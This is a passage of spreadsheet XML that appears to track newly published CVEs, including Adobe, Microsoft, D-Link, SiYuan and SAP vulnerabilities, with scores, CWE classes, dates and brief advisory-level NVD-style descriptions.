          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77109</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77774</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79721</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86510</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86722</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability where sqlDAL caches empty result sets that writeSql never invalidates. Attackers with a valid password can bypass email two-factor authentication on new devices because the confirmation code hash fails to generate from the stale cached empty result.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Teamcenter V2412 (All versions &lt; V2412.0013), Teamcenter V2506 (All versions &lt; V2506.0010), Teamcenter V2512 (All versions &lt; V2512.2607), Teamcenter V2606 (All versions &lt; V2606.2607). Affected applications do not properly encode user-supplied input reflected into HTML attribute contexts within the authentication redirect flow (/auth/ endpoint).
This could allow an unauthenticated remote attacker to inject arbitrary JavaScript into the browser of an authenticated user who loads a crafted URL, enabling the attacker to perform actions within the victim's Teamcenter session.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75993</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85384</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the httpd component of RE210 AC750 due to improper bounds checking in the splitString function when processing an uploaded configuration file. An authenticated attacker on the local network can upload a crafted configuration file to trigger the overflow, leading to remote code execution.
Successful exploitation may allow unauthorized access to sensitive information, modification of device configuration and network behavior, or disruption of device availability.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.003</v>
